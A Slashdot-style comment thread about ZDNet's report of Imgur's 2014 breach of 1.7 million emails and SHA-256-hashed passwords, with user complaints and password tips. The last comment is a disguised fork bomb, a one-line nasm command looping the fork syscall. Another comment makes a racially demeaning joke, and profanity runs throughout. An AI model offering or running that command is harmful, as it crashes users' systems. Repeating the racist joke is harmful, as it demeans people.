Imgur Confirms Email Addresses, Passwords Stolen In 2014 Hack (zdnet.com)
An anonymous reader quotes a report from ZDNet: Imgur, one of the world's most visited websites, has confirmed a hack dating back to 2014. The company confirmed to ZDNet that hackers stole 1.7 million email addresses and passwords, scrambled with the SHA-256 algorithm, which has been passed over in recent years in favor of stronger password scramblers. Imgur said the breach didn't include personal information because the site has "never asked" for real names, addresses, or phone numbers. The stolen accounts represent a fraction of Imgur's 150 million monthly users. The hack went unnoticed for four years until the stolen data was sent to Troy Hunt, who runs data breach notification service Have I Been Pwned. Hunt informed the company on Thursday, a US national holiday observing Thanksgiving, when most businesses are closed. A day later, the company started resetting the passwords of affected accounts, and published a public disclosure alerting users of the breach.
Starting last night it's impossible to login. They make me do a ridiculous number of captchas and then after jumping through all those hoops, tell me I entered the wrong password. Double checked and triple checked and made sure I was entering the correct password. Same thing. Changed my password. Same thing.
Fuck you. Seriously. Fuck you.
sucking on my DAMN balls
Imgur was created for redditors to share their Rick and Morty memes. Meanwhile Goatse was created for Slashdot to share the original memes, It's even a cryptocurrency now.
+1 for lurker strategy
I don't use imgur in any sort of commentary capacity. You don't need to log in to post images, and that's the key draw, or so I thought. To me it's simply an anonymous pastebin for images. I'm actually amazed anyone has given imgur their email address to begin with.
[
I think if you're using the mobile app you have to have all that.
They didn't even know it happened.
by the dawn's early light
what so proudly we hail
dah dah dah dah dah dah
and the rocket's red glare
the bombs bursting in air
gave proof dah dah dah
that out flag was still there
so dah dah dah dah dah
dah dah dah dah dah
on your feet (white guys) or on your knees (black dudes)
Never heard of it.
I honestly never heard of it, so I guess dodged a bullet on that one. Seriously all they can do is reset password from a 2014 hack? Yep, I just refrain from joining any sites anymore. They all seem to get hacked eventually.
I stopped using Imgur when it wanted me to login to share an image. Fuuuuck that. That just leads to this shit.
Well, if they think that you use SHA-256 to __scramble__ data, then obviously they know jack shit about security. So much for the people in charge of security at Imgur.
I have for months now (malware sites hosted there) shown RIGHT NOW as I write this, here https://safeweb.norton.com/buzz/ as (going to 'obfuscate this' as I see it done on many security site blogs) https://safeweb.norton.com/rep... stating that site is serving up exploits/malicious bs from it via imgur[.]ru...
APK
P.S.=> See subject - THAT is FAR from a "1st" too - & when THAT happens? I block the ENTIRE DOMAIN off in hosts after that much evidences of it... apk
It doesn't matter if your password is stolen if you only use it for one site.
I ended up doing something like this. Put it in ~/.bash_profile
I.e. get 4096 bytes of random data from openssl. Hash it to sha512 a couple of times to shuffle the bits. Then encode to base64. Remove any characters that might cause problems leaving [A-Za-z0-9] which most sites allow. Then pick the first n chars (where n defaults to 32 and is passed as an argument)
E.g.
To get the default 32 char password or you can override that on the command line if you know the maximum password the site supports. E.g
Gives a 64 char password
I store 'em in a text file in a small TrueCrypt volume as a backup and sync that across devices. For things like imgur.com I let the browser remember them because there's nothing too critical about the account. The passwords has 62^32 combinations which is hard to brute force and even if someone did brute force it, who cares? All they'll learn is that my password to other sites needs another 62^32/2 tries to brute force which is probably not worth their time.
And if you know the site allows longer passwords, just tell randpass on the command line. E.g
Actually once I got this to work I invented a more elaborate version that encrypted with a per device private RSA key, randomized the number of sha512 hashing stages and so on. But that only matters if you think an attacker can work out what openssl rand returned on your device, which they probably can't.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;